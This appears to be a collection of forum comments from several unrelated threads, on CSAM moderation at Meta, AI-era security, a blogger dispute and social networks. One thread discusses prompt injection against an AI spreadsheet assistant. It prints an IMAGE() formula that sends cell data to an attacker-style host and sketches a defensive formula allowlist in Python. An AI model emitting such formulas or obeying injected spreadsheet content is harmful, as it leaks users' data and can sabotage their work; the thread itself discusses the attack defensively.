In what regard is it incorrect that a single, larger entity that is at least notionally committed to avoiding the existence of any specific type of content on their platform is more likely to successfully avoid the existence of that type of content on their platform than smaller entities with less resources?
Now consider that some of those smaller entities might not be even notionally interested in avoiding the existence of that specific type of content on their platform, and are small enough for regulators to be unaware of its existence?
Yeah, I agree with you. Of course, it's not Meta's fault that the CSAM exists in the first place, but calling the problem of filtering it "extremely difficult" at Meta's scale is misleading: it's a solvable problem, but one that fundamentally requires changing how the platform works, and would likely require spending a lot more money.
It's probably why this "vulnerability" feels like the type of defects you'd see in Windows or desktop applications 20+ years ago.
The root cause was a complete lack of effort to even attempt to secure things, because no one had thought to do so, and now we're starting all over again at a new computing layer. Cloud was somewhat similar, but not nearly as bad.
It's bizarre to me since presumably someone who learned the lessons before is still working, but also great for my job security.
What about this is a vulnerability, let alone one that requires responsible disclosure?
Untrusted data sources can provide data that causes bad things to occur. If that's a vulnerability, then any application that ingests data is riddled with vulnerabilities.
I agree that the behavior should change from a default of allowing external network requests to denying them, but this "report" reads like overly dramatic marketing BS.
> Untrusted data sources can provide data that causes bad things to occur. If that's a vulnerability, then any application that ingests data is riddled with vulnerabilities.
There's an important difference between "the import had bad numbers so the report is wrong" versus "the import had a virus and now our network is compromised."
They are not the same kind of failure, they don't have the same impacts, and they don't involve the same mechanisms for prevention, detection, or remediation.
It's not all that different from people realizing that several popular model servers didn't support access control and could execute commands. It's an inherent part of the design that was rather naive from a security perspective, not something that requires coordinated disclosure or the rest of the security theater described in this marketing release.
Could a cheap fix here be whitelisting the output? If the AI can only emit a known set of formulas, you can't inject IMAGE() with arbitrary URLs, because the output channel doesn't support it. You can't inject what the emitter can't produce. It doesn't fix all prompt injection, but it kills the exfiltration class.
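As a rough sketch of what that could look like (the allowlist and function names here are illustrative, not any vendor's actual API): validate every model-emitted formula against a set of permitted spreadsheet functions, so calls like IMAGE() or IMPORTDATA() that can reach arbitrary URLs are rejected before they ever land in a cell.

```python
import re

# Hypothetical allowlist: only these functions may appear in
# model-emitted formulas. URL-fetching functions such as IMAGE
# or IMPORTDATA are deliberately absent, closing the channel an
# attacker would need for data exfiltration.
ALLOWED_FUNCTIONS = {"SUM", "AVERAGE", "IF", "VLOOKUP", "COUNT", "MIN", "MAX"}

# Matches an uppercase function name immediately followed by "(".
FUNC_NAME = re.compile(r"([A-Z][A-Z0-9_]*)\s*\(")

def is_formula_allowed(formula: str) -> bool:
    """Reject any formula calling a function outside the allowlist."""
    if not formula.startswith("="):
        return True  # a plain value, not a formula; no call-out risk
    called = set(FUNC_NAME.findall(formula.upper()))
    return called <= ALLOWED_FUNCTIONS
```

With this check, `=SUM(A1:A10)` passes, while `=IMAGE("https://evil.example/leak?d="&A1)` is rejected. A real implementation would need a proper formula parser rather than a regex (to handle nested calls, string literals containing parentheses, and so on), but the principle is the same: constrain the emitter's output vocabulary.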
The other is that an attacker can sneak something in that arbitrarily rewrites your spreadsheet. Triggers could be on content, or on a pre-planned attack time across many instances. Impacts could be subtly-flawed conclusions, or coarser "it stopped working and the deadline is looming" sabotage.
"Yeah boss, I sent out the checks to every vendor listed in the spreadsheet, what's wrong?"
What troubling language and slurs are you referring to exactly?
I didn't see anything "troubling" (let alone "extremely troubling") or anything that would indicate that anyone other than the implicated authors have an integrity issue.
I didn't immediately see a red flag that would make me discount all of their work. It's clear what the author's general opinions are. They're entitled to them of course.
I don't see any signs that it's a bot, or that the comment was LLM generated. It's pretty safe to assume they made an alt to post that comment, since they didn't want to voice a negative opinion of a conservative author on their main, i.e. they were trying to avoid controversy.
This website is slightly to the right of reddit these days; what exactly would expressing a negative opinion about a conservative blogger do to their main account?
My suspicion was some affiliation with a current or future implicated individual.
I figured it was someone who just cared enough to make an account.
Yeah, this article seems fine, but looking at some of chris brunet's other articles has me a bit O.O
First time I've run into this with a HN share in a good long while. Not that the article shouldn't have been shared, ofc, but.. it certainly puts me on guard.
Yes, I'm saying that HN is very far left, which wasn't the case just a few years ago. It's mostly a progressive echo chamber at this point plus some interesting tech news.
The point of the line is not that they aren't going to try, it's an acknowledgement of the extreme challenge in diversifying in the short term and incentivizing the next generations who are very, very comfortable with the status quo to build other income streams in the long term.
It is good to point out this alternative is 90% likely going to be a rugpull on "nice cosy 90s style social network" by systemic factors. Regardless of the intent of the owner.
I just realised federated helps re. censorship but not privacy/secrecy needs.
I mean.. yeah. That's why no "Facebook like 2007" social networks have happened since. It would have to be run by someone with a lot of built up trust in order for people to trust it in the way that people did with Facebook. The world has been burnt.
If say, Valve started a social network I would consider using it because they've had decades to screw up Steam and they haven't. It is a bit outside their wheelhouse though.
I was about to respond saying what a terrible article it was, since it reads as if the author has no idea what he's talking about. Attempting to paraphrase the original article would have explained it better.